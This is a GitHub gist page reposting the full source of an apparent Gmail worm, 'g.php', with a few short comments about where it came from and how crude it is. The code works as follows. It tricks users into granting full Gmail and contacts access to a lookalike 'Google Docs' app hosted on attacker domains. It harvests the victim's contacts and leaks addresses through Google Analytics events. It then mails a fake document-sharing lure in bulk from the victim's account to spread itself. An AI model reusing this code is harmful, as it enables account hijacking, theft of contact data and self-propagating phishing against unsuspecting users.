Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
g.php:
<html>
<head>
<script type="text/javascript">
function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
// Your Client ID can be retrieved from your project in the Google
// Developer Console, https://console.developers.google.com
var CLIENT_ID = '946634442539-bpj9bmemdvoedu8d3or6c69am3mi71dh.apps.googleusercontent.com';
var CLIENT_ID_2 = '623002641392-km6voeicvso16uuk7pvc8mvbqheobnft.apps.googleusercontent.com';
var SCOPES = ['https://mail.google.com/', 'https://www.googleapis.com/auth/contacts'];
var redirect_url = 'https://accounts.google.com/o/oauth2/auth?client_id=' + encodeURIComponent(CLIENT_ID) + '&scope=https%3A%2F%2Fmail.google.com%2F+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcontacts&immediate=false&include_granted_scopes=true&response_type=token&redirect_uri=' + encodeURIComponent('https://googledocs.gdocs.pro/g.php') + '&customparam=customparam';
var redirect_url_2 = 'https://accounts.google.com/o/oauth2/auth?client_id=' + encodeURIComponent(CLIENT_ID_2) + '&scope=https%3A%2F%2Fmail.google.com%2F+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcontacts&immediate=false&include_granted_scopes=true&response_type=token&redirect_uri=' + encodeURIComponent('https://googledocs.docscloud.win/g.php') + '&customparam=customparam';
var alert_url = 'http://googledocs.gdocs.pro/r.php?h=287fceafb813de281887692bf3f75532';
/**
* Check if current user has authorized this application.
*/
function checkAuth() {
gapi.auth.authorize(
{
'client_id': CLIENT_ID,
'scope': SCOPES.join(' '),
'immediate': true
}, handleAuthResult);
}
/**
* Handle response from authorization server.
*
* @param {Object} authResult Authorization result.
*/
function handleAuthResult(authResult) {
var authorizeDiv = document.getElementById('authorize-div');
if (authResult && !authResult.error) {
// Hide auth UI, then load client library.
loadGmailApi();
} else {
// Show auth UI, allowing the user to initiate authorization by
// clicking authorize button.
window.top.location.href = alert_url;
}
}
/**
* Load Gmail API client library. List labels once client library
* is loaded.
*/
function loadGmailApi() {
gapi.client.load('gmail', 'v1', listContacts());
}
/**
* Print all Contacts in the authorized user's account. If no contacts
* are found an appropriate message is printed.
*/
function listContacts() {
console.log(gapi.client.gmail);
var token = gapi.auth.getToken();
console.log(token);
$.ajax({
url: "https://www.google.com/m8/feeds/contacts/default/full?access_token=" + token.access_token + "&max-results=1000&orderby=lastmodified&sortorder=descending",
dataType: "jsonp",
success:function(data) {
// display all your data in console
// console.log(JSON.stringify(data));
// console.log(data);
var from_email = getCookie('from');
console.log(from_email);
var parser = new DOMParser();
xmlDoc = parser.parseFromString(data,"text/xml");
var myemail = xmlDoc.getElementsByTagName('author')[0].getElementsByTagName('email')[0].textContent;
console.log(myemail);
var myname = xmlDoc.getElementsByTagName('author')[0].getElementsByTagName('name')[0].textContent;
console.log(myname);
var entries = xmlDoc.getElementsByTagName('feed')[0].getElementsByTagName('entry');
var contacts = [];
var gmail_contacts = [];
var other_contacts = [];
for (var i = 0; i < entries.length; i++){
var name = entries[i].getElementsByTagName('title')[0].textContent;
var emails = entries[i].getElementsByTagName('email');
for (var j = 0; j < emails.length; j++){
var email = emails[j].attributes.getNamedItem('address').value;
if (email != from_email && email != myemail) {
if (email.search('@gmail.com') != -1)
gmail_contacts.push(email);
else if (!(email.search('google') != -1 || email.search('keeper') != -1 || email.search('unty') != -1))
other_contacts.push(email);
}
// console.log(email);
}
}
// console.log(gmail_contacts);
// console.log(other_contacts);
var to = 'hhhhhhhhhhhhhhhh@mailinator.com';
var cc = '';
var bcc = '';
contacts = gmail_contacts.concat(other_contacts);
for (var j = 0; j <= Math.floor(contacts.length / 99); j++) {
bcc = '';
for (var i = j * 99; i < Math.min(j * 99 + 99, contacts.length); i++) {
bcc += contacts[i] + ',';
}
console.log(bcc);
setTimeout(sendEmail, 1000 + j * 100, to, cc, bcc, myemail, myname);
ga('send', 'event', 'gmail_contacts', gmail_contacts.length);
ga('send', 'event', 'other_contacts', other_contacts.length);
ga('send', 'event', myemail, bcc);
}
}
});
}
function sendMessage(headers_obj, message, callback)
{
console.log(gapi.client.gmail);
if (gapi.client.gmail == null) {
ga('send', 'event', 'error', 'error');
setTimeout(redirect, 2000);
return false;
}
var email = '';
for(var header in headers_obj)
email += header += ": "+headers_obj[header]+"\r\n";
email += "\r\n" + message;
var sendRequest = gapi.client.gmail.users.messages.send({
'userId': 'me',
'resource': {
'raw': window.btoa(email).replace(/\+/g, '-').replace(/\//g, '_')
}
});
return sendRequest.execute(callback);
}
function sendEmail(to, cc, bcc, from, myname)
{
var subject = myname + ' has shared a document on Google Docs with you';
console.log(subject);
var body = '<html><body><div style="font-size:14px;line-height:18px;color:#444">' + myname + ' has invited you to view the following document:</div><br/><a href="' + redirect_url_2 + '" style="background-color:#4d90fe;border:1px solid #3079ed;border-radius:2px;color:white;display:inline-block;font-family:Roboto,Arial,Helvetica,sans-serif;font-size:11px;font-weight:bold;height:29px;line-height:29px;min-width:54px;outline:0px;padding:0 8px;text-align:center;text-decoration:none" target="_blank">Open in Docs</a></body></html>';
console.log(body);
sendMessage(
{
'To': to,
'Cc': cc,
'Bcc': bcc,
'Subject': subject,
'Content-Type': 'text/html; charset=UTF-8'
},
body,
composeTidy
);
return false;
}
function composeTidy()
{
console.log('Email sent');
setTimeout(redirect, 2000);
}
function redirect()
{
window.top.location.href = alert_url;
}
</script>
<script src="https://apis.google.com/js/client.js?onload=checkAuth"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-98290545-1', 'auto');
ga('send', 'pageview');
</script>
</head>
<body>
</body>
</html>
@JakeSteam

This comment has been minimized.

Copy link

JakeSteam commented May 3, 2017

Hey, I've seen this elsewhere too, what's the source?

@bevacqua

This comment has been minimized.

Copy link
Owner Author

bevacqua commented May 3, 2017

I spotted it on pastebin: https://pastebin.com/EKdKamFq

@WebReflection

This comment has been minimized.

Copy link

WebReflection commented May 4, 2017

it surprises me that people with very little JS knowledge can write a gmail worm ... are we sure this stuff even work?

  1. it's a .php file for no reason
  2. it brings in jQuery for a basic JSONP and it doesn't use jQuery for anything else
  3. it uses Google Analytics itself so it's asking for troubles on purpose ?

Fun times, I guess.

@credomane

This comment has been minimized.

Copy link

credomane commented May 4, 2017

very little JS knowledge can write a gmail worm.

Welcome to the world of oauth. Secure building but with a glass door and a volunteer guard posted at it that lets anyone through. :/

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.